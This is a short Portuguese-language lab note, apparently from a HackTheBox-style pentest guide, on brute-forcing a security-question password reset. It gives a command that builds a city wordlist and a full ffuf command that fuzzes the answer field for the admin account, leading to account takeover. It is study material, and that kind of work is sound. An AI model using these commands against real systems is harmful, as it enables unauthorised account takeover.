Vulnerable Password Reset
Por exemplo, supondo que um aplicativo da web use uma pergunta de segurança como
What city were you born in?:Usar um arquivo CSV como este que contém uma lista de mais de 25.000 cidades com mais de 15.000 habitantes de todo o mundo.
Como o arquivo CSV contém o nome da cidade no primeiro campo, podemos criar nossa lista de palavras contendo apenas o nome da cidade em cada linha usando o seguinte comando:
cat world-cities.csv | cut -d ',' -f1 > city_wordlist.txtEm seguir especificar que queremos atingir, como por exemplo,
adminUsar o
ffuf
ffuf -w ./city_wordlist.txt -u http://pwreset.htb/security_question.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -b "PHPSESSID=39b54j201u3rhu4tab1pvdb4pv" -d "security_response=FUZZ" -fr "Incorrect response."Após obter a resposta de segurança, podemos redefinir a senha do usuário administrador e assumir totalmente o controle da conta
Last updated